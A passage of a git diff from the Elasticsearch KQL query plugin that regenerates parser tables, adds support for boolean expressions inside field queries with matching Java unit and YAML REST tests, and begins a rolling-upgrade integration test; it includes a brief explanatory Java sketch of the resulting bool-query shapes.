"\u0001\u0000\u0000\u0000st\u0003 \u0010\u0000tu\u0005\u0005\u0000\u0000"+ - "uv\u0005\u0010\u0000\u0000v\u0019\u0001\u0000\u0000\u0000wx\u0003 \u0010"+ - "\u0000xy\u0005\u0005\u0000\u0000yz\u0003\u001e\u000f\u0000z\u0082\u0001"+ - "\u0000\u0000\u0000{|\u0003 \u0010\u0000|}\u0005\u0005\u0000\u0000}~\u0005"+ - "\n\u0000\u0000~\u007f\u0003\u001e\u000f\u0000\u007f\u0080\u0005\u000b"+ - "\u0000\u0000\u0080\u0082\u0001\u0000\u0000\u0000\u0081w\u0001\u0000\u0000"+ - 
"\u0000\u0081{\u0001\u0000\u0000\u0000\u0082\u001b\u0001\u0000\u0000\u0000"+ - "\u0083\u0089\u0003\u001e\u000f\u0000\u0084\u0085\u0005\n\u0000\u0000\u0085"+ - "\u0086\u0003\u001e\u000f\u0000\u0086\u0087\u0005\u000b\u0000\u0000\u0087"+ - "\u0089\u0001\u0000\u0000\u0000\u0088\u0083\u0001\u0000\u0000\u0000\u0088"+ - "\u0084\u0001\u0000\u0000\u0000\u0089\u001d\u0001\u0000\u0000\u0000\u008a"+ - "\u008c\u0007\u0003\u0000\u0000\u008b\u008a\u0001\u0000\u0000\u0000\u008b"+ - "\u008c\u0001\u0000\u0000\u0000\u008c\u008e\u0001\u0000\u0000\u0000\u008d"+ - "\u008f\u0007\u0002\u0000\u0000\u008e\u008d\u0001\u0000\u0000\u0000\u008f"+ - "\u0090\u0001\u0000\u0000\u0000\u0090\u008e\u0001\u0000\u0000\u0000\u0090"+ - "\u0091\u0001\u0000\u0000\u0000\u0091\u0093\u0001\u0000\u0000\u0000\u0092"+ - "\u0094\u0007\u0003\u0000\u0000\u0093\u0092\u0001\u0000\u0000\u0000\u0093"+ - "\u0094\u0001\u0000\u0000\u0000\u0094\u009f\u0001\u0000\u0000\u0000\u0095"+ - "\u0097\u0007\u0000\u0000\u0000\u0096\u0098\u0007\u0003\u0000\u0000\u0097"+ - "\u0096\u0001\u0000\u0000\u0000\u0097\u0098\u0001\u0000\u0000\u0000\u0098"+ - "\u009f\u0001\u0000\u0000\u0000\u0099\u009b\u0005\u0004\u0000\u0000\u009a"+ - "\u009c\u0007\u0000\u0000\u0000\u009b\u009a\u0001\u0000\u0000\u0000\u009b"+ - "\u009c\u0001\u0000\u0000\u0000\u009c\u009f\u0001\u0000\u0000\u0000\u009d"+ - "\u009f\u0005\u000f\u0000\u0000\u009e\u008b\u0001\u0000\u0000\u0000\u009e"+ - "\u0095\u0001\u0000\u0000\u0000\u009e\u0099\u0001\u0000\u0000\u0000\u009e"+ - "\u009d\u0001\u0000\u0000\u0000\u009f\u001f\u0001\u0000\u0000\u0000\u00a0"+ - "\u00a4\u0005\u000e\u0000\u0000\u00a1\u00a4\u0005\u000f\u0000\u0000\u00a2"+ - "\u00a4\u0005\u0010\u0000\u0000\u00a3\u00a0\u0001\u0000\u0000\u0000\u00a3"+ - "\u00a1\u0001\u0000\u0000\u0000\u00a3\u00a2\u0001\u0000\u0000\u0000\u00a4"+ - "!\u0001\u0000\u0000\u0000\u0011#/:MW_nq\u0081\u0088\u008b\u0090\u0093"+ - "\u0097\u009b\u009e\u00a3"; + "\u000f\u0002\u0010\u0007\u0010\u0002\u0011\u0007\u0011\u0001\u0000\u0003"+ + "\u0000&\b\u0000\u0001\u0000\u0001\u0000\u0001\u0001\u0001\u0001\u0001"+ + "\u0001\u0001\u0001\u0001\u0001\u0001\u0001\u0005\u00010\b\u0001\n\u0001"+ + "\f\u00013\t\u0001\u0001\u0002\u0001\u0002\u0001\u0002\u0001\u0002\u0001"+ + "\u0002\u0001\u0002\u0001\u0002\u0001\u0002\u0003\u0002=\b\u0002\u0001"+ + "\u0003\u0001\u0003\u0001\u0003\u0001\u0004\u0001\u0004\u0001\u0004\u0001"+ + "\u0004\u0001\u0004\u0001\u0004\u0001\u0005\u0001\u0005\u0001\u0005\u0001"+ + "\u0005\u0001\u0005\u0001\u0005\u0005\u0005N\b\u0005\n\u0005\f\u0005Q\t"+ + "\u0005\u0001\u0006\u0001\u0006\u0001\u0006\u0001\u0006\u0001\u0006\u0001"+ + "\u0006\u0001\u0006\u0003\u0006Z\b\u0006\u0001\u0007\u0001\u0007\u0001"+ + "\u0007\u0001\u0007\u0001\b\u0001\b\u0003\bb\b\b\u0001\b\u0001\b\u0001"+ + "\t\u0001\t\u0001\t\u0001\t\u0001\n\u0001\n\u0001\n\u0001\n\u0001\u000b"+ + "\u0004\u000bo\b\u000b\u000b\u000b\f\u000bp\u0001\u000b\u0003\u000bt\b"+ + "\u000b\u0001\f\u0001\f\u0001\f\u0001\f\u0001\r\u0001\r\u0001\r\u0001\r"+ + "\u0001\u000e\u0001\u000e\u0001\u000f\u0004\u000f\u0081\b\u000f\u000b\u000f"+ + "\f\u000f\u0082\u0001\u000f\u0003\u000f\u0086\b\u000f\u0001\u000f\u0004"+ + "\u000f\u0089\b\u000f\u000b\u000f\f\u000f\u008a\u0001\u000f\u0004\u000f"+ + "\u008e\b\u000f\u000b\u000f\f\u000f\u008f\u0001\u000f\u0003\u000f\u0093"+ + "\b\u000f\u0001\u000f\u0001\u000f\u0001\u000f\u0003\u000f\u0098\b\u000f"+ + "\u0001\u000f\u0001\u000f\u0001\u000f\u0001\u000f\u0003\u000f\u009e\b\u000f"+ + "\u0001\u0010\u0001\u0010\u0001\u0010\u0001\u0010\u0001\u0010\u0001\u0010"+ + 
"\u0003\u0010\u00a6\b\u0010\u0001\u0010\u0001\u0010\u0001\u0010\u0005\u0010"+ + "\u00ab\b\u0010\n\u0010\f\u0010\u00ae\t\u0010\u0001\u0011\u0001\u0011\u0001"+ + "\u0011\u0003\u0011\u00b3\b\u0011\u0001\u0011\u0000\u0003\u0002\n \u0012"+ + "\u0000\u0002\u0004\u0006\b\n\f\u000e\u0010\u0012\u0014\u0016\u0018\u001a"+ + "\u001c\u001e \"\u0000\u0004\u0001\u0000\u0002\u0003\u0001\u0000\u0006"+ + "\t\u0002\u0000\u000e\u000e\u0010\u0010\u0001\u0000\u0002\u0004\u00c4\u0000"+ + "%\u0001\u0000\u0000\u0000\u0002)\u0001\u0000\u0000\u0000\u0004<\u0001"+ + "\u0000\u0000\u0000\u0006>\u0001\u0000\u0000\u0000\bA\u0001\u0000\u0000"+ + "\u0000\nG\u0001\u0000\u0000\u0000\fY\u0001\u0000\u0000\u0000\u000e[\u0001"+ + "\u0000\u0000\u0000\u0010a\u0001\u0000\u0000\u0000\u0012e\u0001\u0000\u0000"+ + "\u0000\u0014i\u0001\u0000\u0000\u0000\u0016s\u0001\u0000\u0000\u0000\u0018"+ + "u\u0001\u0000\u0000\u0000\u001ay\u0001\u0000\u0000\u0000\u001c}\u0001"+ + "\u0000\u0000\u0000\u001e\u009d\u0001\u0000\u0000\u0000 \u00a5\u0001\u0000"+ + "\u0000\u0000\"\u00b2\u0001\u0000\u0000\u0000$&\u0003\u0002\u0001\u0000"+ + "%$\u0001\u0000\u0000\u0000%&\u0001\u0000\u0000\u0000&\'\u0001\u0000\u0000"+ + "\u0000\'(\u0005\u0000\u0000\u0001(\u0001\u0001\u0000\u0000\u0000)*\u0006"+ + "\u0001\uffff\uffff\u0000*+\u0003\u0004\u0002\u0000+1\u0001\u0000\u0000"+ + "\u0000,-\n\u0002\u0000\u0000-.\u0007\u0000\u0000\u0000.0\u0003\u0002\u0001"+ + "\u0002/,\u0001\u0000\u0000\u000003\u0001\u0000\u0000\u00001/\u0001\u0000"+ + "\u0000\u000012\u0001\u0000\u0000\u00002\u0003\u0001\u0000\u0000\u0000"+ + "31\u0001\u0000\u0000\u00004=\u0003\u0006\u0003\u00005=\u0003\b\u0004\u0000"+ + "6=\u0003\u0012\t\u00007=\u0003\u0010\b\u00008=\u0003\u0018\f\u00009=\u0003"+ + "\u0014\n\u0000:=\u0003\u001a\r\u0000;=\u0003\u001c\u000e\u0000<4\u0001"+ + "\u0000\u0000\u0000<5\u0001\u0000\u0000\u0000<6\u0001\u0000\u0000\u0000"+ + "<7\u0001\u0000\u0000\u0000<8\u0001\u0000\u0000\u0000<9\u0001\u0000\u0000"+ + "\u0000<:\u0001\u0000\u0000\u0000<;\u0001\u0000\u0000\u0000=\u0005\u0001"+ + "\u0000\u0000\u0000>?\u0005\u0004\u0000\u0000?@\u0003\u0004\u0002\u0000"+ + "@\u0007\u0001\u0000\u0000\u0000AB\u0003\"\u0011\u0000BC\u0005\u0005\u0000"+ + "\u0000CD\u0005\f\u0000\u0000DE\u0003\n\u0005\u0000EF\u0005\r\u0000\u0000"+ + "F\t\u0001\u0000\u0000\u0000GH\u0006\u0005\uffff\uffff\u0000HI\u0003\f"+ + "\u0006\u0000IO\u0001\u0000\u0000\u0000JK\n\u0002\u0000\u0000KL\u0007\u0000"+ + "\u0000\u0000LN\u0003\n\u0005\u0002MJ\u0001\u0000\u0000\u0000NQ\u0001\u0000"+ + "\u0000\u0000OM\u0001\u0000\u0000\u0000OP\u0001\u0000\u0000\u0000P\u000b"+ + "\u0001\u0000\u0000\u0000QO\u0001\u0000\u0000\u0000RZ\u0003\u0006\u0003"+ + "\u0000SZ\u0003\b\u0004\u0000TZ\u0003\u0010\b\u0000UZ\u0003\u000e\u0007"+ + "\u0000VZ\u0003\u0018\f\u0000WZ\u0003\u0014\n\u0000XZ\u0003\u001a\r\u0000"+ + "YR\u0001\u0000\u0000\u0000YS\u0001\u0000\u0000\u0000YT\u0001\u0000\u0000"+ + "\u0000YU\u0001\u0000\u0000\u0000YV\u0001\u0000\u0000\u0000YW\u0001\u0000"+ + "\u0000\u0000YX\u0001\u0000\u0000\u0000Z\r\u0001\u0000\u0000\u0000[\\\u0005"+ + "\n\u0000\u0000\\]\u0003\n\u0005\u0000]^\u0005\u000b\u0000\u0000^\u000f"+ + "\u0001\u0000\u0000\u0000_`\u0005\u0010\u0000\u0000`b\u0005\u0005\u0000"+ + "\u0000a_\u0001\u0000\u0000\u0000ab\u0001\u0000\u0000\u0000bc\u0001\u0000"+ + "\u0000\u0000cd\u0005\u0010\u0000\u0000d\u0011\u0001\u0000\u0000\u0000"+ + "ef\u0005\n\u0000\u0000fg\u0003\u0002\u0001\u0000gh\u0005\u000b\u0000\u0000"+ + "h\u0013\u0001\u0000\u0000\u0000ij\u0003\"\u0011\u0000jk\u0007\u0001\u0000"+ + 
"\u0000kl\u0003\u0016\u000b\u0000l\u0015\u0001\u0000\u0000\u0000mo\u0007"+ + "\u0002\u0000\u0000nm\u0001\u0000\u0000\u0000op\u0001\u0000\u0000\u0000"+ + "pn\u0001\u0000\u0000\u0000pq\u0001\u0000\u0000\u0000qt\u0001\u0000\u0000"+ + "\u0000rt\u0005\u000f\u0000\u0000sn\u0001\u0000\u0000\u0000sr\u0001\u0000"+ + "\u0000\u0000t\u0017\u0001\u0000\u0000\u0000uv\u0003\"\u0011\u0000vw\u0005"+ + "\u0005\u0000\u0000wx\u0005\u0010\u0000\u0000x\u0019\u0001\u0000\u0000"+ + "\u0000yz\u0003\"\u0011\u0000z{\u0005\u0005\u0000\u0000{|\u0003\u001e\u000f"+ + "\u0000|\u001b\u0001\u0000\u0000\u0000}~\u0003\u001e\u000f\u0000~\u001d"+ + "\u0001\u0000\u0000\u0000\u007f\u0081\u0007\u0002\u0000\u0000\u0080\u007f"+ + "\u0001\u0000\u0000\u0000\u0081\u0082\u0001\u0000\u0000\u0000\u0082\u0080"+ + "\u0001\u0000\u0000\u0000\u0082\u0083\u0001\u0000\u0000\u0000\u0083\u009e"+ + "\u0001\u0000\u0000\u0000\u0084\u0086\u0007\u0002\u0000\u0000\u0085\u0084"+ + "\u0001\u0000\u0000\u0000\u0085\u0086\u0001\u0000\u0000\u0000\u0086\u0088"+ + "\u0001\u0000\u0000\u0000\u0087\u0089\u0007\u0003\u0000\u0000\u0088\u0087"+ + "\u0001\u0000\u0000\u0000\u0089\u008a\u0001\u0000\u0000\u0000\u008a\u0088"+ + "\u0001\u0000\u0000\u0000\u008a\u008b\u0001\u0000\u0000\u0000\u008b\u009e"+ + "\u0001\u0000\u0000\u0000\u008c\u008e\u0007\u0000\u0000\u0000\u008d\u008c"+ + "\u0001\u0000\u0000\u0000\u008e\u008f\u0001\u0000\u0000\u0000\u008f\u008d"+ + "\u0001\u0000\u0000\u0000\u008f\u0090\u0001\u0000\u0000\u0000\u0090\u0092"+ + "\u0001\u0000\u0000\u0000\u0091\u0093\u0007\u0002\u0000\u0000\u0092\u0091"+ + "\u0001\u0000\u0000\u0000\u0092\u0093\u0001\u0000\u0000\u0000\u0093\u009e"+ + "\u0001\u0000\u0000\u0000\u0094\u009e\u0005\u000f\u0000\u0000\u0095\u0097"+ + "\u0005\u0004\u0000\u0000\u0096\u0098\u0003\u001e\u000f\u0000\u0097\u0096"+ + "\u0001\u0000\u0000\u0000\u0097\u0098\u0001\u0000\u0000\u0000\u0098\u009e"+ + "\u0001\u0000\u0000\u0000\u0099\u009a\u0005\n\u0000\u0000\u009a\u009b\u0003"+ + " \u0010\u0000\u009b\u009c\u0005\u000b\u0000\u0000\u009c\u009e\u0001\u0000"+ + "\u0000\u0000\u009d\u0080\u0001\u0000\u0000\u0000\u009d\u0085\u0001\u0000"+ + "\u0000\u0000\u009d\u008d\u0001\u0000\u0000\u0000\u009d\u0094\u0001\u0000"+ + "\u0000\u0000\u009d\u0095\u0001\u0000\u0000\u0000\u009d\u0099\u0001\u0000"+ + "\u0000\u0000\u009e\u001f\u0001\u0000\u0000\u0000\u009f\u00a0\u0006\u0010"+ + "\uffff\uffff\u0000\u00a0\u00a1\u0005\n\u0000\u0000\u00a1\u00a2\u0003 "+ + "\u0010\u0000\u00a2\u00a3\u0005\u000b\u0000\u0000\u00a3\u00a6\u0001\u0000"+ + "\u0000\u0000\u00a4\u00a6\u0003\u001e\u000f\u0000\u00a5\u009f\u0001\u0000"+ + "\u0000\u0000\u00a5\u00a4\u0001\u0000\u0000\u0000\u00a6\u00ac\u0001\u0000"+ + "\u0000\u0000\u00a7\u00a8\n\u0003\u0000\u0000\u00a8\u00a9\u0007\u0000\u0000"+ + "\u0000\u00a9\u00ab\u0003\u001e\u000f\u0000\u00aa\u00a7\u0001\u0000\u0000"+ + "\u0000\u00ab\u00ae\u0001\u0000\u0000\u0000\u00ac\u00aa\u0001\u0000\u0000"+ + "\u0000\u00ac\u00ad\u0001\u0000\u0000\u0000\u00ad!\u0001\u0000\u0000\u0000"+ + "\u00ae\u00ac\u0001\u0000\u0000\u0000\u00af\u00b3\u0005\u000e\u0000\u0000"+ + "\u00b0\u00b3\u0005\u000f\u0000\u0000\u00b1\u00b3\u0005\u0010\u0000\u0000"+ + "\u00b2\u00af\u0001\u0000\u0000\u0000\u00b2\u00b0\u0001\u0000\u0000\u0000"+ + "\u00b2\u00b1\u0001\u0000\u0000\u0000\u00b3#\u0001\u0000\u0000\u0000\u0012"+ + "%1 extends ParseTreeVisitor { * @return the visitor result */ T visitFieldQueryValue(KqlBaseParser.FieldQueryValueContext ctx); + /** + * Visit a parse tree produced by {@link KqlBaseParser#booleanFieldQueryValue}. 
+ * @param ctx the parse tree + * @return the visitor result + */ + T visitBooleanFieldQueryValue(KqlBaseParser.BooleanFieldQueryValueContext ctx); /** * Visit a parse tree produced by {@link KqlBaseParser#fieldName}. * @param ctx the parse tree diff --git a/x-pack/plugin/kql/src/test/java/org/elasticsearch/xpack/kql/parser/KqlParserFieldQueryTests.java b/x-pack/plugin/kql/src/test/java/org/elasticsearch/xpack/kql/parser/KqlParserFieldQueryTests.java index 95814ee265745..3aa6283fe9b6f 100644 --- a/x-pack/plugin/kql/src/test/java/org/elasticsearch/xpack/kql/parser/KqlParserFieldQueryTests.java +++ b/x-pack/plugin/kql/src/test/java/org/elasticsearch/xpack/kql/parser/KqlParserFieldQueryTests.java @@ -10,8 +10,10 @@ import org.elasticsearch.core.Strings; import org.elasticsearch.index.query.BoolQueryBuilder; import org.elasticsearch.index.query.MatchNoneQueryBuilder; +import org.elasticsearch.index.query.QueryBuilder; import java.util.List; +import java.util.function.Consumer; import static org.hamcrest.Matchers.containsInAnyOrder; import static org.hamcrest.Matchers.empty; @@ -77,7 +79,10 @@ public void testParseUnquotedLiteralKeywordFieldQuery() { // Leading operators (AND, OR) are terms of the match query assertTermQueryBuilder(parseKqlQuery(kqlFieldQuery(KEYWORD_FIELD_NAME, "AND bar")), KEYWORD_FIELD_NAME, "AND bar"); assertTermQueryBuilder(parseKqlQuery(kqlFieldQuery(KEYWORD_FIELD_NAME, "OR bar")), KEYWORD_FIELD_NAME, "OR bar"); - assertTermQueryBuilder(parseKqlQuery(kqlFieldQuery(KEYWORD_FIELD_NAME, "NOT bar")), KEYWORD_FIELD_NAME, "NOT bar"); + assertMustNotQueryBuilder( + parseKqlQuery(kqlFieldQuery(KEYWORD_FIELD_NAME, "NOT bar")), + (subQuery) -> assertTermQueryBuilder(subQuery, KEYWORD_FIELD_NAME, "bar") + ); // Lonely operators (AND, NOT, OR) assertTermQueryBuilder(parseKqlQuery(kqlFieldQuery(KEYWORD_FIELD_NAME, "AND AND")), KEYWORD_FIELD_NAME, "AND AND"); @@ -124,6 +129,7 @@ public void testParseUnquotedLiteralMatchFieldsQuery() { // Multiple words assertMatchQueryBuilder(parseKqlQuery(kqlFieldQuery(fieldName, "foo bar")), fieldName, "foo bar"); + assertMatchQueryBuilder(parseKqlQuery(kqlFieldQuery(fieldName, "(foo bar)")), fieldName, "foo bar"); // Escaped keywords assertMatchQueryBuilder(parseKqlQuery(kqlFieldQuery(fieldName, "foo \\and bar")), fieldName, "foo and bar"); @@ -151,7 +157,10 @@ public void testParseUnquotedLiteralMatchFieldsQuery() { // Leading operators (AND, OR) are terms of the match query assertMatchQueryBuilder(parseKqlQuery(kqlFieldQuery(fieldName, "AND bar")), fieldName, "AND bar"); assertMatchQueryBuilder(parseKqlQuery(kqlFieldQuery(fieldName, "OR bar")), fieldName, "OR bar"); - assertMatchQueryBuilder(parseKqlQuery(kqlFieldQuery(fieldName, "NOT bar")), fieldName, "NOT bar"); + assertMustNotQueryBuilder( + parseKqlQuery(kqlFieldQuery(fieldName, "NOT bar")), + (subQuery) -> assertMatchQueryBuilder(subQuery, fieldName, "bar") + ); // Lonely operators (AND, NOT, OR) assertMatchQueryBuilder(parseKqlQuery(kqlFieldQuery(fieldName, "AND")), fieldName, "AND"); @@ -174,6 +183,66 @@ public void testParseUnquotedLiteralMatchFieldsQuery() { } } + private void assertMustNotQueryBuilder(QueryBuilder queryBuilder, Consumer clauseVerifier) { + BoolQueryBuilder boolQuery = asInstanceOf(BoolQueryBuilder.class, queryBuilder); + assertThat(boolQuery.must(), empty()); + assertThat(boolQuery.should(), empty()); + assertThat(boolQuery.filter(), empty()); + assertThat(boolQuery.mustNot(), hasSize(1)); + + clauseVerifier.accept(boolQuery.mustNot().get(0)); + } + + public void 
testBooleanFieldQueries() { + assertShouldQueryBuilder( + parseKqlQuery(kqlFieldQuery(KEYWORD_FIELD_NAME, "(foo OR bar)")), + (clause) -> assertTermQueryBuilder(clause, KEYWORD_FIELD_NAME, "foo"), + (clause) -> assertTermQueryBuilder(clause, KEYWORD_FIELD_NAME, "bar") + ); + + assertMustQueryBuilder( + parseKqlQuery(kqlFieldQuery(KEYWORD_FIELD_NAME, "(foo AND bar)")), + (clause) -> assertTermQueryBuilder(clause, KEYWORD_FIELD_NAME, "foo"), + (clause) -> assertTermQueryBuilder(clause, KEYWORD_FIELD_NAME, "bar") + ); + + assertMustQueryBuilder( + parseKqlQuery(kqlFieldQuery(KEYWORD_FIELD_NAME, "(foo or bar and baz)")), + (clause) -> assertShouldQueryBuilder( + clause, + (subClause) -> assertTermQueryBuilder(subClause, KEYWORD_FIELD_NAME, "foo"), + (subClause) -> assertTermQueryBuilder(subClause, KEYWORD_FIELD_NAME, "bar") + ), + (clause) -> assertTermQueryBuilder(clause, KEYWORD_FIELD_NAME, "baz") + ); + } + + @SafeVarargs + private final void assertShouldQueryBuilder(QueryBuilder queryBuilder, Consumer... clauseVerifiers) { + BoolQueryBuilder boolQuery = asInstanceOf(BoolQueryBuilder.class, queryBuilder); + assertThat(boolQuery.must(), empty()); + assertThat(boolQuery.filter(), empty()); + assertThat(boolQuery.mustNot(), empty()); + assertThat(boolQuery.should(), hasSize(clauseVerifiers.length)); + + for (int i = 0; i < clauseVerifiers.length; i++) { + clauseVerifiers[i].accept(boolQuery.should().get(i)); + } + } + + @SafeVarargs + private final void assertMustQueryBuilder(QueryBuilder queryBuilder, Consumer... clauseVerifiers) { + BoolQueryBuilder boolQuery = asInstanceOf(BoolQueryBuilder.class, queryBuilder); + assertThat(boolQuery.should(), empty()); + assertThat(boolQuery.filter(), empty()); + assertThat(boolQuery.mustNot(), empty()); + assertThat(boolQuery.must(), hasSize(clauseVerifiers.length)); + + for (int i = 0; i < clauseVerifiers.length; i++) { + clauseVerifiers[i].accept(boolQuery.must().get(i)); + } + } + public void testParseQuotedStringKeywordFieldQuery() { // Single word assertTermQueryBuilder(parseKqlQuery(kqlFieldQuery(KEYWORD_FIELD_NAME, quoteString("foo"))), KEYWORD_FIELD_NAME, "foo"); @@ -278,7 +347,10 @@ public void testParseWildcardKeywordFieldQuery() { // Leading operators (AND, OR) are terms of the match query assertWildcardQueryBuilder(parseKqlQuery(kqlFieldQuery(KEYWORD_FIELD_NAME, "AND fo*")), KEYWORD_FIELD_NAME, "AND fo*"); assertWildcardQueryBuilder(parseKqlQuery(kqlFieldQuery(KEYWORD_FIELD_NAME, "OR fo*")), KEYWORD_FIELD_NAME, "OR fo*"); - assertWildcardQueryBuilder(parseKqlQuery(kqlFieldQuery(KEYWORD_FIELD_NAME, "NOT fo*")), KEYWORD_FIELD_NAME, "NOT fo*"); + assertMustNotQueryBuilder( + parseKqlQuery(kqlFieldQuery(KEYWORD_FIELD_NAME, "NOT fo*")), + (subQuery) -> assertWildcardQueryBuilder(subQuery, KEYWORD_FIELD_NAME, "fo*") + ); } public void testFieldWildcardFieldQueries() { @@ -291,7 +363,6 @@ public void testFieldWildcardFieldQueries() { assertThat(parsedQuery.mustNot(), empty()); assertThat(parsedQuery.must(), empty()); assertThat(parsedQuery.filter(), empty()); - assertThat(parsedQuery.minimumShouldMatch(), equalTo("1")); assertThat(parsedQuery.should(), hasSize(searchableFields.size())); assertThat( diff --git a/x-pack/plugin/kql/src/test/java/org/elasticsearch/xpack/kql/parser/KqlParserTests.java b/x-pack/plugin/kql/src/test/java/org/elasticsearch/xpack/kql/parser/KqlParserTests.java index b9055ae166aa7..d322a76035d8a 100644 --- a/x-pack/plugin/kql/src/test/java/org/elasticsearch/xpack/kql/parser/KqlParserTests.java +++ 
b/x-pack/plugin/kql/src/test/java/org/elasticsearch/xpack/kql/parser/KqlParserTests.java @@ -12,6 +12,7 @@ import java.io.IOException; +import static org.hamcrest.Matchers.containsString; import static org.hamcrest.Matchers.equalTo; import static org.hamcrest.Matchers.isA; @@ -38,11 +39,11 @@ public void testMatchAllQuery() { } public void testParenthesizedQuery() throws IOException { - for (String baseQuuery : readQueries(SUPPORTED_QUERY_FILE_PATH)) { + for (String baseQuery : readQueries(SUPPORTED_QUERY_FILE_PATH)) { // For each supported query, wrap it into parentheses and check query remains the same. // Adding random whitespaces as well and test they are ignored. - String parenthesizedQuery = wrapWithRandomWhitespaces("(") + baseQuuery + wrapWithRandomWhitespaces(")"); - assertThat(parseKqlQuery(parenthesizedQuery), equalTo(parseKqlQuery(baseQuuery))); + String parenthesizedQuery = "(" + baseQuery + ")"; + assertThat(parseKqlQuery(parenthesizedQuery), equalTo(parseKqlQuery(baseQuery))); } } @@ -80,8 +81,8 @@ public void testSyntaxErrorsHandling() { { KqlParsingException e = assertThrows(KqlParsingException.class, () -> parseKqlQuery("foo: (bar baz AND qux")); assertThat(e.getLineNumber(), equalTo(1)); - assertThat(e.getColumnNumber(), equalTo(15)); - assertThat(e.getMessage(), equalTo("line 1:15: missing ')' at 'AND'")); + assertThat(e.getColumnNumber(), equalTo(22)); + assertThat(e.getMessage(), containsString("line 1:22: missing ')' at ''")); } } } diff --git a/x-pack/plugin/kql/src/test/resources/unsupported-queries b/x-pack/plugin/kql/src/test/resources/unsupported-queries index 526ae94d6ac88..3a6fbc8b67ab3 100644 --- a/x-pack/plugin/kql/src/test/resources/unsupported-queries +++ b/x-pack/plugin/kql/src/test/resources/unsupported-queries @@ -41,8 +41,6 @@ mapped_nested: { mapped_string:foo OR (mapped_string_2:foo bar OR foo bar) } // Missing escape sequences: mapped_string: foo:bar -mapped_string: (foo and bar) -mapped_string: (foo or bar) mapped_string: foo not bar mapped_string: foo { bar } mapped_string: foo (bar) diff --git a/x-pack/plugin/kql/src/yamlRestTest/resources/rest-api-spec/test/kql/10_kql_basic_query.yml b/x-pack/plugin/kql/src/yamlRestTest/resources/rest-api-spec/test/kql/10_kql_basic_query.yml index bb59c6a48b612..d4dc483796be5 100644 --- a/x-pack/plugin/kql/src/yamlRestTest/resources/rest-api-spec/test/kql/10_kql_basic_query.yml +++ b/x-pack/plugin/kql/src/yamlRestTest/resources/rest-api-spec/test/kql/10_kql_basic_query.yml @@ -47,7 +47,7 @@ setup: } - match: { hits.total: 2 } - # Using the *:* syntax + # Using the *: syntax - do: search: index: test-index @@ -58,7 +58,7 @@ setup: } - match: { hits.total: 2 } - # Using the *:* syntax + # Using the *: syntax - do: search: index: test-index @@ -210,3 +210,65 @@ setup: - match: { hits.total: 1 } - match: { hits.hits.0._id: "doc-1" } + +--- +"KQL boolean expressions within field queries": + - requires: + capabilities: + - method: POST + path: /_search + capabilities: [ kql_query_boolean_field_query ] + test_runner_features: capabilities + reason: Support for boolean expressions within field queries is not available.
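For reference, the boolean field-query expansion that the unit tests above and the YAML cases below pin down has the following shapes. This is an illustrative sketch built with the standard `QueryBuilders` helpers, not code taken from the KQL parser itself:

```java
import org.elasticsearch.index.query.BoolQueryBuilder;
import org.elasticsearch.index.query.QueryBuilders;

public class KqlBooleanFieldQueryShapes {
    public static void main(String[] args) {
        // text_field:(foo AND bar) -> both clauses are required.
        BoolQueryBuilder and = QueryBuilders.boolQuery()
            .must(QueryBuilders.matchQuery("text_field", "foo"))
            .must(QueryBuilders.matchQuery("text_field", "bar"));

        // text_field:(bar OR baz) -> either clause may match.
        BoolQueryBuilder or = QueryBuilders.boolQuery()
            .should(QueryBuilders.matchQuery("text_field", "bar"))
            .should(QueryBuilders.matchQuery("text_field", "baz"));

        // text_field:(foo AND NOT baz) -> NOT becomes a nested must_not clause,
        // mirroring the assertMustNotQueryBuilder checks above.
        BoolQueryBuilder andNot = QueryBuilders.boolQuery()
            .must(QueryBuilders.matchQuery("text_field", "foo"))
            .must(QueryBuilders.boolQuery().mustNot(QueryBuilders.matchQuery("text_field", "baz")));

        // Each builder prints the JSON body the YAML tests send.
        System.out.println(and);
        System.out.println(or);
        System.out.println(andNot);
    }
}
```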
+ + - do: + search: + index: test-index + rest_total_hits_as_int: true + body: > + { + "query": { "kql": { "query": "text_field:(foo AND bar)" } } + } + - match: { hits.total: 1 } + - match: { hits.hits.0._id: "doc-1" } + + - do: + search: + index: test-index + rest_total_hits_as_int: true + body: > + { + "query": { "kql": { "query": "text_field:(bar OR baz)" } } + } + - match: { hits.total: 2 } + + - do: + search: + index: test-index + rest_total_hits_as_int: true + body: > + { + "query": { "kql": { "query": "text_field:(foo AND NOT baz)" } } + } + - match: { hits.total: 1 } + - match: { hits.hits.0._id: "doc-1" } + + - do: + search: + index: test-index + rest_total_hits_as_int: true + body: > + { + "query": { "kql": { "query": "keyword_field:(\"foo bar\" OR \"foo baz\")" } } + } + - match: { hits.total: 2 } + + - do: + search: + index: test-index + rest_total_hits_as_int: true + body: > + { + "query": { "kql": { "query": "keyword_field:(\"foo bar\" AND \"foo baz\")" } } + } + - match: { hits.total: 0 } diff --git a/x-pack/plugin/logsdb/qa/rolling-upgrade/src/javaRestTest/java/org/elasticsearch/upgrades/MatchOnlyTextRollingUpgradeIT.java b/x-pack/plugin/logsdb/qa/rolling-upgrade/src/javaRestTest/java/org/elasticsearch/upgrades/MatchOnlyTextRollingUpgradeIT.java new file mode 100644 index 0000000000000..80a77d76ea162 --- /dev/null +++ b/x-pack/plugin/logsdb/qa/rolling-upgrade/src/javaRestTest/java/org/elasticsearch/upgrades/MatchOnlyTextRollingUpgradeIT.java @@ -0,0 +1,252 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the "Elastic License + * 2.0", the "GNU Affero General Public License v3.0 only", and the "Server Side + * Public License v 1"; you may not use this file except in compliance with, at + * your election, the "Elastic License 2.0", the "GNU Affero General Public + * License v3.0 only", or the "Server Side Public License, v 1". 
+ */ + +package org.elasticsearch.upgrades; + +import com.carrotsearch.randomizedtesting.annotations.Name; + +import org.elasticsearch.client.Request; +import org.elasticsearch.client.Response; +import org.elasticsearch.client.ResponseException; +import org.elasticsearch.common.network.NetworkAddress; +import org.elasticsearch.common.time.DateFormatter; +import org.elasticsearch.common.time.FormatNames; +import org.elasticsearch.common.xcontent.XContentHelper; +import org.elasticsearch.test.rest.ObjectPath; +import org.elasticsearch.xcontent.XContentType; + +import java.io.IOException; +import java.io.InputStream; +import java.time.Instant; +import java.util.List; +import java.util.Locale; +import java.util.Map; + +import static org.elasticsearch.upgrades.LogsIndexModeRollingUpgradeIT.enableLogsdbByDefault; +import static org.elasticsearch.upgrades.LogsIndexModeRollingUpgradeIT.getWriteBackingIndex; +import static org.hamcrest.Matchers.containsString; +import static org.hamcrest.Matchers.equalTo; +import static org.hamcrest.Matchers.greaterThanOrEqualTo; +import static org.hamcrest.Matchers.notNullValue; + +public class 